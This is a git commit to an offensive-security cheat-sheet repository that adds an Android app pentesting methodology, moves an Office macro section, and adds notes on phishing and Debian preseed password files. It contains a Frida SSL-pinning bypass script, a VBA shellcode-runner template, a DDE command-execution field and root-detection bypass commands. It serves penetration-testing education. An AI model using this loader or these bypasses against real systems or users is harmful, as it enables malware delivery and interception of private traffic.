PrivEsc preseed + Android Methodology

pull/14/head
Swissky 2024-07-15 23:07:13 +02:00
parent 5bc78524ea
commit 7d9d46c010
4 changed files with 493 additions and 57 deletions

View File

@ -0,0 +1,374 @@
# Android Application
## Summary
* [Extract APK](#extract-apk)
* [ADB Method](#adb-method)
* [Stores](#stores)
* [Static Analysis](#static-analysis)
* [Extract Contents From APK](#extract-contents-from-apk)
* [Decompile Data as Java Code](#decompile-data-as-Java-code)
* [Decompile Native Code](#decompile-native-code)
* [Sign and Package APK](#sign-and-package-apk)
* [Mobile Security Framework Static](#mobile-security-framework-static)
* [Online Assets](#online-assets)
* [React Native and Hermes](#react-native-and-hermes)
* [Dynamic Analysis](#dynamic-analysis)
* [Frida](#frida)
* [Runtime Mobile Security](#runtime-mobile-security)
* [Genymotion](#genymotion)
* [Android SDK Emulator](#android-sdk-emulator)
* [Mobile Security Framework Dynamic](#mobile-security-framework-dynamic)
* [SSL Pinning Bypass](#ssl-pinning-bypass)
* [Root Detection Bypass](#root-detection-bypass)
* [References](#references)
## Lab
* [HTB - Pinned](https://app.hackthebox.com/challenges/282)
* [HTB - Manager](https://app.hackthebox.com/challenges/283)
## Extract APK
### ADB Method
Connect to ADB shell and list/download packages.
You might need to enable `Developer mode` and `Debugging` in order to connect with `adb`
```powershell
adb shell pm list packages
adb shell pm path com.example.someapp
adb pull /data/app/com.example.someapp-2.apk
```
### Stores
Warning: Downloading APK files from unofficial stores can compromise your device's security. These sources often host malware and malicious software. Always use trusted and official app stores for downloads.
* [Google Play](https://play.google.com/store/apps) - Official Store
* [Apkpure](https://apkpure.fr/fr/) - Alternative to Google Play
* [Aptoide](https://fr.aptoide.com/) - Alternative to Google Play
## Static Analysis
### Extract Contents From APK
Search for strings `flag`,`secret`, the default string file is `Resources/resources.arsc/res/values/strings.xml`.
```powershell
apktool d application.apk
```
### Decompile Data as Java Code
* Rename `application.apk` to `application.zip`: `mv application.apk application.zip`
* Extract `classes.dex`: `unzip application.zip`
* Use `dex2jar` to obtain a jar file: `/usr/bin/d2j-dex2jar classes.dex`
* Use `jadx` using full CPU: `jadx classes.dex -j $(grep -c ^processor /proc/cpuinfo) -d Downloads/app/ > /dev/null`
```powershell
jadx-gui
--deobf # remove obfuscation by AndroGuard
-e # generate a gradle project for Android Studio (easy to find function)
```
To reverse `.odex` you need to provide the `/system/framework/arm`, fortunately since we have the firmware we have it.
```powershell
java -jar baksmali-2.3.4.jar x application.odex -d k107-mb-8.1/system/framework/arm -o application
apktool d application.apk
apktool b rebuild_folder -o rebuilt.apk
```
### Decompile Native Code
Native library are represented as `.so` files.
These libraries by default are included in the APK at the file path `/lib/<cpu>/lib<name>.so` or `/assets/<custom_name>`.
Use `IDA`, `Radare2/Cutter` or `Ghidra` to reverse them.
| CPU Native | Library Path |
|----------------------|-----------------------------|
| "generic" 32-bit ARM | lib/armeabi/libcalc.so |
| x86 | lib/x86/libcalc.so |
| x64 | lib/x86_64/libcalc.so |
| ARMv7 | lib/armeabi-v7a/libcalc.so |
| ARM64 | lib/arm64-v8a/libcalc.so |
:warning: The shared object file (`.so`) doesn't need to be embedded in the app.
### Sign and Package APK
* `apktool` + `jarsigner`
```powershell
apktool b ./application.apk
keytool -genkey -v -keystore application.keystore -alias application -keyalg RSA -keysize 2048 -validity 10000
jarsigner -verbose -sigalg SHA1withRSA -digestalg SHA1 -keystore application.keystore application.apk application
zipalign -v 4 application.apk application-signed.apk
```
* `apktool` + `signapk`
```powershell
apktool b app-release
./signapk app-release/dist/app-release.apk
```
* [patrickfav/uber-apk-signer](https://github.com/patrickfav/uber-apk-signer) (Linux only)
```powershell
java -jar uber-apk-signer.jar --apks /path/to/apks
```
* [APK Toolkit v1.3](https://xdaforums.com/t/tool-apk-toolkit-v1-3-windows.4572881/) (Windows only)
### Mobile Security Framework Static
> Mobile Security Framework (MobSF) is an automated, all-in-one mobile application (Android/iOS/Windows) pen-testing, malware analysis and security assessment framework capable of performing static and dynamic analysis.
* [MobSF - Documentation](https://mobsf.github.io/docs/#/)
* [MobSF - Github](https://github.com/MobSF/Mobile-Security-Framework-MobSF)
* [MobSF - Live Demo](https://mobsf.live/)
Run [MobSF/Mobile-Security-Framework-MobSF](https://github.com/MobSF/Mobile-Security-Framework-MobSF)
* Latest version from DockerHub
```powershell
docker run -it --name mobsf -p 8000:8000 opensecurity/mobile-security-framework-mobsf:latest
```
* Enable persistence on the Docker container
```powershell
docker run -it --rm --name mobsf -p 8000:8000 -v <your_local_dir>:/root/.MobSF opensecurity/mobile-security-framework-mobsf:latest
```
### Online Assets
:warning: Uploading APKs to uncontrolled websites risks data leaks, malware, intellectual property theft, and privacy violations. Use trusted platforms only to ensure the security and integrity of your app.
* [appetize.io](https://appetize.io/) - Instantly run mobile apps in your browser
* [mobsf.live](https://mobsf.live/) - Demo version of MobSF
* [hybrid-analysis.com](https://www.hybrid-analysis.com/sample/573df0b1cb5ffc0a25306be5ec83483ed1b2acdba37dd93223b9f14f42b2fdea?environmentId=200) - Sandbox analysis of APK files
### React Native and Hermes
Identify React Native app with `index.android.bundle` inside the `assets` folder
```ps1
Hermes: pip install hbctool
╰─$ hbctool disasm index.android.bundle indexasm
[*] Disassemble 'index.android.bundle' to 'indexasm' path
[*] Hermes Bytecode [ Source Hash: 4013cb75f7e16d4474f5cf258edc45ee16585560, HBC Version: 74 ]
[*] Done
```
## Dynamic Analysis
Dynamic analysis for Android malware involves executing and monitoring an app in a controlled environment to observe its behavior. This technique detects malicious activities like data exfiltration, unauthorized access, and system modifications. Additionally, it aids in reverse engineering app features, revealing hidden functionalities and potential vulnerabilities for better threat mitigation.
### Burp Suite
* Proxy > Listen to all interfaces
* Import/Export CA certificate
* `adb push burp.der /sdcard/burp.crt`
* Open the Settings on the device and search "Install Cert"
* Click Install certificates from SD card
* Configure the AVD to use the proxy
### Frida
* [Frida - Documentation](https://frida.re/docs/android)
* [Frida - Github](https://github.com/frida/frida/)
Download [`frida`](https://github.com/frida/frida/releases) from releases.
```ps1
pip install frida-tools
unxz frida-server.xz
adb root # might be required
adb push frida-server /data/local/tmp/
adb shell "chmod 755 /data/local/tmp/frida-server"
adb shell "/data/local/tmp/frida-server &"
```
Interesting Frida scripts:
* [Universal Android SSL Pinning Bypass with Frida](https://codeshare.frida.re/@pcipolloni/universal-android-ssl-pinning-bypass-with-frida/) - `frida --codeshare pcipolloni/universal-android-ssl-pinning-bypass-with-frida -f YOUR_BINARY`
* [frida-multiple-unpinning](https://codeshare.frida.re/@akabe1/frida-multiple-unpinning/) - `frida --codeshare akabe1/frida-multiple-unpinning -f YOUR_BINARY`
* [aesinfo](https://codeshare.frida.re/@dzonerzy/aesinfo/) - `frida --codeshare dzonerzy/aesinfo -f YOUR_BINARY`
* [fridantiroot](https://codeshare.frida.re/@dzonerzy/fridantiroot/) - `frida --codeshare dzonerzy/fridantiroot -f YOUR_BINARY`
* [anti-frida-bypass](https://codeshare.frida.re/@enovella/anti-frida-bypass/) - `frida --codeshare enovella/anti-frida-bypass -f YOUR_BINARY`
* [xamarin-antiroot](https://codeshare.frida.re/@Gand3lf/xamarin-antiroot/) - `frida --codeshare Gand3lf/xamarin-antiroot -f YOUR_BINARY`
* [Intercept Android APK Crypto Operations](https://codeshare.frida.re/@fadeevab/intercept-android-apk-crypto-operations/) - `frida --codeshare fadeevab/intercept-android-apk-crypto-operations -f YOUR_BINARY`
* [Android Location Spoofing](https://codeshare.frida.re/@dzervas/android-location-spoofing/) - `frida --codeshare dzervas/android-location-spoofing -f YOUR_BINARY`
* [java-crypto-viewer](https://codeshare.frida.re/@Serhatcck/java-crypto-viewer/) - `frida --codeshare Serhatcck/java-crypto-viewer -f YOUR_BINARY`
### Runtime Mobile Security
> Runtime Mobile Security (RMS) 📱🔥 - is a powerful web interface that helps you to manipulate Android and iOS Apps at Runtime
* [RMS - Github](https://github.com/m0bilesecurity/RMS-Runtime-Mobile-Security)
**Requirements**:
* `adb`
* `frida`: server up and running on the target device
In case of issue with your favorite Browser, please use Google Chrome (fully supported).
* Install RMS
```powershell
npm install -g rms-runtime-mobile-security
```
* Make sure `frida-server` is up and running on the target device.
* Launch RMS: `rms`
* Open your browser at http://127.0.0.1:5491/
* Attach to the app, find name with `adb shell pm list package | grep NAME`
### Genymotion
Genymotion is a robust Android emulator designed for developers, offering fast and reliable virtual devices for app testing. It features GPS, battery, and network simulation, enabling comprehensive testing and development
* [Genymotion](https://www.genymotion.com/)
* [Genymotion Desktop](https://www.genymotion.com/product-desktop/)
* [Genymotion Device Image](https://www.genymotion.com/product-device-image/)
* [Genymotion SaaS](https://www.genymotion.com/product-cloud/)
### Android SDK emulator
Android Virtual Device (AVD) without Google Play Store.
* Download the files for an API 25 build
```powershell
sdkmanager "system-images;android-25;google_apis;x86_64"
```
* Create a device based on what we downloaded previously
```powershell
avdmanager create avd x86_64_api_25 -k "system-images;android-25;google_apis;x86_64"
```
* Run the emulator
```powershell
emulator @x86_64_api_25
emulator -list-avds
emulator -avd <non_production_avd_name> -writable-system -no-snapshot
emulator -avd Pixel_XL_API_31 -writable-system -http-proxy 127.0.0.1:8080
```
* Install the APK
```powershell
adb install ./challenge.apk
```
* Start the App
```powershell
adb shell monkey -p com.scottyab.rootbeer.sample 1
```
### Mobile Security Framework Dynamic
:warning: Dynamic Analysis will not work if you use MobSF docker container or setup MobSF inside a Virtual Machine.
**Requirements**:
* Genymotion (Supports x86_64 architecture Android 4.1 - 11.0, upto API 30)
* Android 5.0 - 11.0 - uses Frida and works out of the box with zero configuration or setup.
* Android 4.1 - 4.4 - uses Xposed Framework and requires MobSFy
* Genymotion Cloud
* [Amazon Marketplace - TCP 5555](https://aws.amazon.com/marketplace/seller-profile?id=933724b4-d35f-4266-905e-e52e4792bc45)
* [Azure Marketplace - TCP 5555](https://azuremarketplace.microsoft.com/en-us/marketplace/apps/genymobile.genymotion-cloud)
* Android Studio Emulator (only Android images upto API 28 are supported)
* AVD without Google Play Store
Dynamic Analysis from MobSF grants you the following features:
* Web API Viewer
* Frida API Monitor
## SSL Pinning Bypass
SSL certificate pinning in an APK involves embedding a server's public key or certificate directly into the app. This ensures the app only trusts specific certificates, preventing man-in-the-middle attacks by rejecting any certificates not matching the pinned ones, even if they are otherwise valid.
:warning: Android 9.0 is changing the defaults for Network Security Configuration to block all cleartext traffic.
* [shroudedcode/apk-mitm](https://github.com/shroudedcode/apk-mitm) - A CLI application that automatically prepares Android APK files for HTTPS inspection
```powershell
$ npx apk-mitm application.apk
npx: 139 installé(s) en 12.206s
╭ apk-mitm v0.6.1
├ apktool v2.4.1
╰ uber-apk-signer v1.1.0
Using temporary directory:
/tmp/87d3a4921ddf86cde634205480f89e90
✔ Decoding APK file
✔ Modifying app manifest
✔ Modifying network security config
✔ Disabling certificate pinning
✔ Encoding patched APK file
✔ Signing patched APK file
Done! Patched file: ./application.apk
```
* [51j0/Android-CertKiller](https://github.com/51j0/Android-CertKiller) - An automation script to bypass SSL/Certificate pinning in Android
```powershell
$ python main.py -w #(Wizard mode)
$ python main.py -p 'root/Desktop/base.apk' #(Manual mode)
```
* [frida/frida](https://github.com/frida/frida) - Universal SSL Pinning Bypass
```javascript
$ adb devices
$ adb root
$ adb shell
$ phone:/# ./frida-server
// https://codeshare.frida.re/@pcipolloni/universal-android-ssl-pinning-bypass-with-frida/
$ frida -U --codeshare pcipolloni/universal-android-ssl-pinning-bypass-with-frida -f com.example.pinned
$ frida -U -f org.package.name -l universal-ssl-check-bypass.js --no-pause
Java.perform(function() {
var array_list = Java.use("java.util.ArrayList");
var ApiClient = Java.use('com.android.org.conscrypt.TrustManagerImpl');
ApiClient.checkTrustedRecursive.implementation = function(a1,a2,a3,a4,a5,a6) {
var k = array_list.$new();
return k;
}
},0);
```
* [m0bilesecurity/RMS-Runtime-Mobile-Security](https://github.com/m0bilesecurity/RMS-Runtime-Mobile-Security) - Certificate Pinning bypass script (all + okhttpv3)
* [federicodotta/Brida](https://github.com/federicodotta/Brida) - The new bridge between Burp Suite and Frida
## Root Detection Bypass
Common root detection techniques:
* Su binaries: `su`/`busybox`
* Known Root Files/Paths : `Superuser.apk`
* Root Management Apps: `Magisk`, `SuperSU `
* RW paths: `/system`, `/data` directories
* System Properties
Common bypass:
* [fridantiroot](https://codeshare.frida.re/@dzonerzy/fridantiroot/) - `frida --codeshare dzonerzy/fridantiroot -f YOUR_BINARY`
* [xamarin-antiroot](https://codeshare.frida.re/@Gand3lf/xamarin-antiroot/) - `frida --codeshare Gand3lf/xamarin-antiroot -f YOUR_BINARY`
* [multiple-root-detection-bypass/](https://codeshare.frida.re/@KishorBal/multiple-root-detection-bypass/) - `frida --codeshare KishorBal/multiple-root-detection-bypass -f YOUR_BINARY`
## References
* [Android App Reverse Engineering 101 - @maddiestone](https://www.ragingrock.com/AndroidAppRE/)
* [Android app vulnerability classes - Google Play Protect](https://static.googleusercontent.com/media/www.google.com/fr//about/appsecurity/play-rewards/Android_app_vulnerability_classes.pdf)
* [Mobile Systems and Smartphone Security - @reyammer](https://mobisec.reyammer.io)
* [Configuring Frida with BurpSuite and Genymotion to bypass Android SSL Pinning - arben](https://spenkk.github.io/bugbounty/Configuring-Frida-with-Burp-and-GenyMotion-to-bypass-SSL-Pinning/)
* [Configuring Burp Suite With Android Nougat - ropnop - January 18, 2018](https://blog.ropnop.com/configuring-burp-suite-with-android-nougat)
* [Configuring Burp Suite with Android Emulators - Aashish Tamang - Jun 6, 2022](https://blog.yarsalabs.com/setting-up-burp-for-android-application-testing/)
* [Introduction to Android Pentesting - Jarrod - July 8, 2024](https://owlhacku.com/introduction-to-android-pentesting/)
* [A beginners guide to using Frida to bypass root detection. - DianaOpanga - Nov 27, 2023](https://medium.com/@dianaopanga/a-beginners-guide-to-using-frida-to-bypass-root-detection-16af76b989ac)

View File

@ -4,7 +4,6 @@
* [Office Products Features](#office-products-features) * [Office Products Features](#office-products-features)
* [Office Default Passwords](#office-default-passwords) * [Office Default Passwords](#office-default-passwords)
* [Office Macro execute WinAPI](#office-macro-execute-winapi)
* [Excel](#excel) * [Excel](#excel)
* [XLSM - Hot Manchego](#xlsm---hot-manchego) * [XLSM - Hot Manchego](#xlsm---hot-manchego)
* [XLS - Macrome](#xls---macrome) * [XLS - Macrome](#xls---macrome)
@ -35,6 +34,9 @@
* [VBA - Offensive Security Template](#vba---offensive-security-template) * [VBA - Offensive Security Template](#vba---offensive-security-template)
* [DOCX - Template Injection](#docx---template-injection) * [DOCX - Template Injection](#docx---template-injection)
* [DOCX - DDE](#docx---dde) * [DOCX - DDE](#docx---dde)
* [Visual Studio Tools for Office (VSTO)](#visual-studio-tools-for-office-vsto)
* [Office Macro Development](#office-macro-development)
* [Execute WinAPI](#execute-winapi)
* [References](#references) * [References](#references)
@ -55,61 +57,6 @@ By default, Excel does not set a password when saving a new file. However, some
| PowerPoint | 01Hannes Ruescher/01 | .pps .ppt | | PowerPoint | 01Hannes Ruescher/01 | .pps .ppt |
## Office Macro execute WinAPI
### Description
To importe Win32 function we need to use the keyword `Private Declare`
```vb
Private Declare Function <NAME> Lib "<DLL_NAME>" Alias "<FUNCTION_IMPORTED>" (<ByVal/ByRef> <NAME_VAR> As <TYPE>, etc.) As <TYPE>
```
If we work on 64bit, we need to add the keyword `PtrSafe` between the keywords `Declare` and `Function`
Importing the `GetUserNameA` from `advapi32.dll`:
```vb
Private Declare PtrSafe Function GetUserName Lib "advapi32.dll" Alias "GetUserNameA" (ByVal lpBuffer As String, ByRef nSize As Long) As Long
```
`GetUserNameA` prototype in C:
```C
BOOL GetUserNameA(
LPSTR lpBuffer,
LPDWORD pcbBuffer
);
```
### Example with a simple Shellcode Runner
```vb
Private Declare PtrSafe Function VirtualAlloc Lib "Kernel32.dll" (ByVal lpAddress As Long, ByVal dwSize As Long, ByVal flAllocationType As Long, ByVal flProtect As Long) As LongPtr
Private Declare PtrSafe Function RtlMoveMemory Lib "Kernel32.dll" (ByVal lDestination As LongPtr, ByRef sSource As Any, ByVal lLength As Long) As LongPtr
Private Declare PtrSafe Function CreateThread Lib "KERNEL32.dll" (ByVal SecurityAttributes As Long, ByVal StackSize As Long, ByVal StartFunction As LongPtr, ThreadParameter As LongPtr, ByVal CreateFlags As Long, ByRef ThreadId As Long) As LongPtr
Sub WinAPI()
Dim buf As Variant
Dim addr As LongPtr
Dim counter As Long
Dim data As Long
buf = Array(252, ...)
addr = VirtualAlloc(0, UBound(buf), &H3000, &H40)
For counter = LBound(buf) To UBound(buf)
data = buf(counter)
res = RtlMoveMemory(addr + counter, data, 1)
Next counter
res = CreateThread(0, 0, addr, 0, 0, 0)
End Sub
```
## Excel ## Excel
### XLSM - Hot Manchego ### XLSM - Hot Manchego
@ -769,6 +716,63 @@ $ phishery -u https://secure.site.local/docs -i good.docx -o bad.docx
* `{ DDEAUTO c:\\windows\\system32\\cmd.exe "/k calc.exe" }` * `{ DDEAUTO c:\\windows\\system32\\cmd.exe "/k calc.exe" }`
## Visual Studio Tools for Office (VSTO)
A VSTO file is a project file created with Visual Studio Tools for Office, a set of development tools provided by Microsoft for building custom add-ins and solutions for Microsoft Office applications. These projects allow developers to enhance the functionality of Office programs like Excel, Word, and Outlook by integrating additional features, automation, and user interface customizations.
* Visual Studio > `Word 2013 and 2016 VSTO Add-in`
## Office Macro Development
### Execute WinAPI
To importe Win32 function we need to use the keyword `Private Declare`
```vb
Private Declare Function <NAME> Lib "<DLL_NAME>" Alias "<FUNCTION_IMPORTED>" (<ByVal/ByRef> <NAME_VAR> As <TYPE>, etc.) As <TYPE>
```
If we work on 64bit, we need to add the keyword `PtrSafe` between the keywords `Declare` and `Function`
Importing the `GetUserNameA` from `advapi32.dll`:
```vb
Private Declare PtrSafe Function GetUserName Lib "advapi32.dll" Alias "GetUserNameA" (ByVal lpBuffer As String, ByRef nSize As Long) As Long
```
`GetUserNameA` prototype in C:
```C
BOOL GetUserNameA(
LPSTR lpBuffer,
LPDWORD pcbBuffer
);
```
### Example with a simple Shellcode Runner
```vb
Private Declare PtrSafe Function VirtualAlloc Lib "Kernel32.dll" (ByVal lpAddress As Long, ByVal dwSize As Long, ByVal flAllocationType As Long, ByVal flProtect As Long) As LongPtr
Private Declare PtrSafe Function RtlMoveMemory Lib "Kernel32.dll" (ByVal lDestination As LongPtr, ByRef sSource As Any, ByVal lLength As Long) As LongPtr
Private Declare PtrSafe Function CreateThread Lib "KERNEL32.dll" (ByVal SecurityAttributes As Long, ByVal StackSize As Long, ByVal StartFunction As LongPtr, ThreadParameter As LongPtr, ByVal CreateFlags As Long, ByRef ThreadId As Long) As LongPtr
Sub WinAPI()
Dim buf As Variant
Dim addr As LongPtr
Dim counter As Long
Dim data As Long
buf = Array(252, ...)
addr = VirtualAlloc(0, UBound(buf), &H3000, &H40)
For counter = LBound(buf) To UBound(buf)
data = buf(counter)
res = RtlMoveMemory(addr + counter, data, 1)
Next counter
res = CreateThread(0, 0, addr, 0, 0, 0)
End Sub
```
## References ## References
* [VBA RunPE Part 1 - itm4n](https://itm4n.github.io/vba-runpe-part1/) * [VBA RunPE Part 1 - itm4n](https://itm4n.github.io/vba-runpe-part1/)
@ -799,3 +803,7 @@ $ phishery -u https://secure.site.local/docs -i good.docx -o bad.docx
* [So you think you can block Macros? - Pieter Ceelen - April 25, 2023](https://outflank.nl/blog/2023/04/25/so-you-think-you-can-block-macros/) * [So you think you can block Macros? - Pieter Ceelen - April 25, 2023](https://outflank.nl/blog/2023/04/25/so-you-think-you-can-block-macros/)
* [MS OFFICE FILE FORMAT SORCERY - TROOPERS19 - Pieter Ceelen & Stan Hegt - 21 March 2019 ](https://github.com/outflanknl/Presentations/blob/master/Troopers19_MS_Office_file_format_sorcery.pdf) * [MS OFFICE FILE FORMAT SORCERY - TROOPERS19 - Pieter Ceelen & Stan Hegt - 21 March 2019 ](https://github.com/outflanknl/Presentations/blob/master/Troopers19_MS_Office_file_format_sorcery.pdf)
* [VenomousSway - VBA payload generation framework / Retired TrustedSec Capabilities - Trustedsec - May 22, 2024](https://github.com/trustedsec/The_Shelf/tree/main/Retired/venomoussway) * [VenomousSway - VBA payload generation framework / Retired TrustedSec Capabilities - Trustedsec - May 22, 2024](https://github.com/trustedsec/The_Shelf/tree/main/Retired/venomoussway)
* [T1137.006 - Office Application Startup: Add-ins - redcanaryco](https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1137.006/T1137.006.md)
* [VSTO: THE PAYLOAD INSTALLER THAT PROBABLY DEFEATS YOUR APPLICATION WHITELISTING RULES - BOHOPS - JANUARY 31, 2018](https://bohops.com/2018/01/31/vsto-the-payload-installer-that-probably-defeats-your-application-whitelisting-rules/)
* [Make phishing great again. VSTO office files are the new macro nightmare? - Daniel Schell - Apr 14, 2022](https://medium.com/@airlockdigital/make-phishing-great-again-vsto-office-files-are-the-new-macro-nightmare-e09fcadef010)
* [Analyzing VSTO Office Files - Didier Stevens - April 29, 2022](https://blog.nviso.eu/2022/04/29/analyzing-vsto-office-files/)

View File

@ -0,0 +1,25 @@
# Phishing
> TODO
## Opsec fail
* wildcard
## GoPhish
### IOC
*
## Evilginx
## References
* [A Smooth Sea Never Made a Skilled Phisherman - Kuba Gretzky - 8 july 2024](https://youtu.be/Nh99d3YnpI4)
* [Unraveling and Countering Adversary-in-the-Middle Phishing Attacks - Pawel Partyka - 8 july 2024](https://youtu.be/-W-LxcbUxI4)

View File

@ -201,6 +201,34 @@ $ locate password | more
... ...
``` ```
### Preseed
A preseed.cfg file is used in Debian-based Linux distributions to automate the installation process. It contains answers to the questions that the installer normally asks, allowing for a fully unattended installation. This file can specify configurations such as partitioning schemes, package selections, network settings, and user accounts.
* Root password in clear text
```ps1
d-i passwd/root-password password root_password_123
d-i passwd/root-password-again password root_password_123
```
* Root password encrypted using an MD5 hash
```ps1
d-i passwd/root-password-crypted password $1$DhSfFtNS$v/Eb.KsQkTq8nKIX1.B8n.
```
* Normal user's password in clear text
```ps1
d-i passwd/user-password password my_password_123
d-i passwd/user-password-again password my_password_123
```
* Normal user's password encrypted using an MD5 hash
```ps1
d-i passwd/user-password-crypted password $1$DgJMNO1/$BqfY2C5y00p0yhpApPmmJ1
```
## SSH Key ## SSH Key
### Sensitive files ### Sensitive files
@ -830,3 +858,4 @@ https://www.exploit-db.com/exploits/18411
* [Local Privilege Escalation Workshop - Slides.pdf - @sagishahar](https://github.com/sagishahar/lpeworkshop/blob/master/Local%20Privilege%20Escalation%20Workshop%20-%20Slides.pdf) * [Local Privilege Escalation Workshop - Slides.pdf - @sagishahar](https://github.com/sagishahar/lpeworkshop/blob/master/Local%20Privilege%20Escalation%20Workshop%20-%20Slides.pdf)
* [SSH Key Predictable PRNG (Authorized_Keys) Process - @weaknetlabs](https://github.com/weaknetlabs/Penetration-Testing-Grimoire/blob/master/Vulnerabilities/SSH/key-exploit.md) * [SSH Key Predictable PRNG (Authorized_Keys) Process - @weaknetlabs](https://github.com/weaknetlabs/Penetration-Testing-Grimoire/blob/master/Vulnerabilities/SSH/key-exploit.md)
* [The Dirty Pipe Vulnerability](https://dirtypipe.cm4all.com/) * [The Dirty Pipe Vulnerability](https://dirtypipe.cm4all.com/)
* [Setting the root password in preseed.cfg for unattended installation - Sebest - Mar 31, 2010](https://sebest.github.io/post/setting-the-root-password-in-preseed-cfg-for-unattended-installation/)